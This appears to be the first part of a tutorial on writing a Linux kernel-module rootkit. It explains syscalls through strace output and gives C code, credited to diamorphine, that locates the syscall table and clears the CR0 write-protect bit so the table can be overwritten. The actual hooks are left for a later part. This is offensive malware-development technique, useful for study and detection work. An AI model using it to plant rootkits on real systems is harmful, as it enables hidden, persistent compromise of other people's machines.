Every technique used in this rootkit can be found on the internet. I am NOT responsible for any damage you might cause using my code
what you will learn
- what system calls are
- how to hijack them
how to hook syscalls
what?
to make the magic work, you have to deceive user space programs, which means controlling the interface between user space and the kernel, i.e. syscalls
take cat for example: how does it open the target file for reading?
$ strace cat /tmp/test
execve("/usr/bin/cat", ["cat", "/tmp/test"], 0x7ffc0ef32218 /* 29 vars */) = 0
brk(NULL) = 0x5564de58a000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=41793, ...}) = 0
mmap(NULL, 41793, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ceaf000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260A\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1824496, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15cead000
mmap(NULL, 1837056, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe15ccec000
mprotect(0x7fe15cd0e000, 1658880, PROT_NONE) = 0
mmap(0x7fe15cd0e000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x22000) = 0x7fe15cd0e000
mmap(0x7fe15ce56000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16a000) = 0x7fe15ce56000
mmap(0x7fe15cea3000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b6000) = 0x7fe15cea3000
mmap(0x7fe15cea9000, 14336, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe15cea9000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7fe15ceae540) = 0
mprotect(0x7fe15cea3000, 16384, PROT_READ) = 0
mprotect(0x5564de4d4000, 4096, PROT_READ) = 0
mprotect(0x7fe15cee1000, 4096, PROT_READ) = 0
munmap(0x7fe15ceaf000, 41793) = 0
brk(NULL) = 0x5564de58a000
brk(0x5564de5ab000) = 0x5564de5ab000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=3031632, ...}) = 0
mmap(NULL, 3031632, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ca07000
close(3) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072) = 5
write(1, "test\n", 5test
) = 5
read(3, "", 131072) = 0
munmap(0x7fe15c9e5000, 139264) = 0
close(3) = 0
close(1) = 0
close(2) = 0
exit_group(0) = ?
+++ exited with 0 +++
the core part:
openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072) = 5
write(1, "test\n", 5test
) = 5
more specifically, it's the openat syscall that helps cat get the target file. now we know that if we hook openat, we can tell cat that this file doesn't exist, or give it Permission denied
hook?
redirecting a syscall to a custom function is called hooking.
to do that, first we need to
find syscall table
basically it's about replacing syscalls with your own functions. in practice, you just modify the syscall table, which holds the addresses of all syscall handlers
once you have made the target entry point to your custom function, all user space programs start talking to your function instead of the real one
to do that, first we need to get the syscall table
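#include <linux/kernel.h>   /* ULONG_MAX (on the older kernels this code targets) */
#include <linux/syscalls.h> /* sys_close */
#include <asm/unistd.h>     /* __NR_close */

unsigned long*
get_syscall_table_bf(void)
{
    unsigned long* syscall_table;
    unsigned long int i;

    /* start at sys_close and walk upwards, one pointer-sized step at a time */
    for (i = (unsigned long int)sys_close; i < ULONG_MAX;
         i += sizeof(void*)) {
        /* treat the current address as a candidate table */
        syscall_table = (unsigned long*)i;
        /* the real table holds sys_close's address at index __NR_close */
        if (syscall_table[__NR_close] == (unsigned long)sys_close)
            return syscall_table;
    }
    return NULL;
}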
the above code is borrowed from diamorphine
several notes to keep in mind:
- a syscall function is of type long, meaning it can return a signed (negative) long int, i.e. a negated errno value, on failure
- syscall_table[__NR_close] means the close entry of the syscall_table array, in which __NR_close is the syscall number (index) of close
- the syscall table is an array of unsigned long, each element holds the address of the corresponding syscall
now i will explain what happens in the get_syscall_table_bf() function:
- we define a syscall_table to hold the actual syscall table that we eventually get
- sys_close represents the current close syscall's address, it's the starting point of our search
- loop until i reaches ULONG_MAX, i.e. the max unsigned long value. in each iteration, we treat (unsigned long*)i as a candidate syscall_table (address) and check whether it is valid, by testing if syscall_table[__NR_close] equals the actual close syscall
- return as soon as we find a match
how does the search work?
$ sudo cat /boot/System.map-xxxx-generic | grep -e 'sys_call_table' -e 'sys_close'
ffffffff8125e8e0 T __ia32_sys_close
ffffffff8125ec70 T __x64_sys_close # `sys_close` address
ffffffff81c001e0 R sys_call_table # syscall table address
ffffffff81c015c0 R ia32_sys_call_table
ffffffff825985f0 t _eil_addr___ia32_sys_close
ffffffff82598600 t _eil_addr___x64_sys_close
we see that sys_call_table's address is greater than sys_close's, therefore by doing a search from sys_close to ULONG_MAX (the highest address possible), we are able to find sys_call_table
why close then? well, technically any symbol that resides lower than sys_call_table will do.
simply put, we just need some point to start from. as long as sys_call_table is in our search interval (and the start address is pointer-aligned, so that stepping by sizeof(void*) lands exactly on the table), we will find it without issue
note: since the syscall table is located at runtime, you only need to compile the LKM once for the same kernel
once the syscall table is located, our next move is
alter syscall table
one does not simply modify the syscall table, because the line ffffffff81c001e0 R sys_call_table has an R, which implies it's read-only
there are solutions, of course, please read this:
there's a WP (write protect) bit in the cr0 control register:
When set, the CPU can't write to read-only pages when privilege level is 0
privilege level 0 is where the kernel, and therefore your LKM code, runs, so by clearing the WP bit in cr0, we get permission to write to read-only pages
sounds really cool, but how do we do that?
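/* original cr0 value, saved in mod_init() so that both helpers can see it */
static unsigned long cr0;

static inline void
protect_memory(void)
{
    /* restore the saved value, which still has the WP bit set */
    write_cr0(cr0);
}

static inline void
unprotect_memory(void)
{
    /* clear bit 16 (WP) and leave every other bit untouched */
    write_cr0(cr0 & ~0x00010000);
}

static int mod_init(void) {
    cr0 = read_cr0();
    unprotect_memory();
    /* hook some syscalls */
    protect_memory();
    return 0;
}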
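0x00010000 is bit 16 of cr0, the WP bit. ~0x00010000 has a 0 only at that position, and AND with 0 always gives 0, thus the WP bit gets cleared while all other bits are kept. we could OR it back of course, but since we have already saved the original value from read_cr0(), setting cr0 back is really easy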
okay, i guess i have covered the kernel hooking part. in 0x02, i'm gonna hook some syscalls to finish our LKM